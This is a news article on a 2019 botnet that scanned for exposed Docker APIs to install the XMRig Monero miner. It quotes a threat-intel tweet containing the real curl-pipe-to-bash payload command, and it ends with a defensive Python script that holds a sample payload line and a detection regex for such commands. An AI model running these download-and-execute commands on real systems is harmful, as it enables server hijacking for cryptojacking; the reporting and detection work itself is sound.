Unknown hackers have launched a new campaign that is actively scanning for vulnerable Docker instances to inject cryptomining code.
Discovered by cybersecurity firm Bad Packets LLC, the group is actively scanning for vulnerable Docker instances that have application programming interface endpoints exposed to the internet. While efforts by hackers to find and hijack servers are routine, this case is notable for its volume: those behind it have scanned over 59,000 IP networks in an attempt to identify vulnerable instances.
“What set this campaign apart was the large uptick of scanning activity. This alone warranted further investigation to find out what this botnet was up to,” Troy Mursch, chief research officer and co-founder of Bad Packets, told ZDNet. “This isn’t your average script kiddie exploit attempt… there was a moderate level of effort put into this campaign, and we haven’t fully analyzed every single thing it does as of yet.”
Once a vulnerable Docker instance is located, a command is run to install the XMRig mining software, which hijacks the server to mine the Monero cryptocurrency.
Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.
These scans create a container using an Alpine Linux image, and execute the payload via:
"Command": "chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'" #threatintel
— Bad Packets Report (@bad_packets) November 25, 2019
Monero has long been the favorite cryptocurrency of hackers. Unlike bitcoin and other cryptocurrencies that use a public blockchain, which makes transactions traceable, Monero is private and difficult, if not nearly impossible, to trace.
This isn’t the first time Docker has been targeted by those attempting to install cryptomining code. In March, unpatched Docker hosts were targeted through a runC vulnerability, with access also gained via Docker’s remote API being left open to the public, and Monero mining software was installed. Last month, a cryptojacking worm dubbed “Graboid” was spotted in the wild after spreading to more than 2,000 unsecured Docker hosts. If this sounds repetitive, it should: in each case the hackers exploited Docker vulnerabilities to install Monero cryptomining code.
In this new campaign, as of Nov. 26 the miners may have been actively scanning but had yet to seriously profit. Mursch estimates they have only managed to mine 14.82 Monero (XMR), worth around $832.
Users who run Docker instances are advised to check whether they are exposing their API endpoints and, if they are, to close the ports and terminate any unrecognized running containers.
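The two checks that advice boils down to, written as a small added example (not code from the article or from Bad Packets): one function flags a tcp:// listener in Docker's daemon.json "hosts" list, and another scans `docker inspect` output for containers that look like the payload in the tweet above (a chroot into /mnt followed by a curl-pipe-to-shell). The sample inspect data, container names and payload URL are constructed for the example; that the campaign bind-mounts the host root filesystem at /mnt is an assumption inferred from the `chroot /mnt` command, not something the article states.

```python
import json
import re

# Constructed sample of `docker inspect` output for two containers: one
# ordinary web container and one shaped like the campaign described in the
# article (Alpine image, host root mounted, chroot + curl|bash payload).
# IDs, names and the payload URL are made up for this example.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "0" * 63 + "1",
        "Name": "/web",
        "Config": {"Image": "nginx:1.17", "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
    },
    {
        "Id": "0" * 63 + "2",
        "Name": "/quirky_hopper",
        "Config": {
            "Image": "alpine:latest",
            "Cmd": ["chroot", "/mnt", "/bin/sh", "-c",
                    "curl -sL4 https://payload.example.invalid/x | bash;"],
        },
        # Assumption: the host root is bind-mounted at /mnt so that
        # `chroot /mnt` runs the payload against the host, not the container.
        "HostConfig": {"Binds": ["/:/mnt"]},
    },
])

# Download-and-execute pattern: curl or wget piped into sh/bash.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def host_root_mounted(binds):
    """True if any bind mount uses the host's root directory as its source.

    Docker bind strings look like "src:dst[:options]".
    """
    for bind in binds or []:
        src = bind.split(":", 1)[0]
        if src == "/":
            return True
    return False


def suspicious_command(cmd):
    """True if the container command chroots and pipes a download into a shell."""
    if not cmd:
        return False
    return "chroot" in cmd and PIPE_TO_SHELL.search(" ".join(cmd)) is not None


def find_suspicious_containers(inspect_json):
    """Names of containers that mount host / and run a chroot + curl|sh payload."""
    hits = []
    for container in json.loads(inspect_json):
        binds = container.get("HostConfig", {}).get("Binds")
        cmd = container.get("Config", {}).get("Cmd")
        if host_root_mounted(binds) and suspicious_command(cmd):
            hits.append(container["Name"])
    return hits


def exposed_tcp_hosts(daemon_json):
    """Return the tcp:// listeners configured in daemon.json's "hosts" list.

    A tcp:// entry makes the Docker API reachable over the network; unless it
    is firewalled and protected with TLS client certificates, that is exactly
    the exposure this campaign scans for.
    """
    cfg = json.loads(daemon_json)
    return [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]


if __name__ == "__main__":
    sample_daemon = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
    print("tcp listeners:", exposed_tcp_hosts(sample_daemon))
    print("suspicious containers:", find_suspicious_containers(SAMPLE_INSPECT))
```

On a real host, feed `exposed_tcp_hosts` the contents of /etc/docker/daemon.json and `find_suspicious_containers` the output of `docker inspect $(docker ps -q)`. The daemon can also be told to listen on TCP through the `-H` flag in its systemd unit rather than daemon.json, so check both places; the container check is a narrow signature for this one payload shape, not a general cryptominer detector.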
Image: Flickr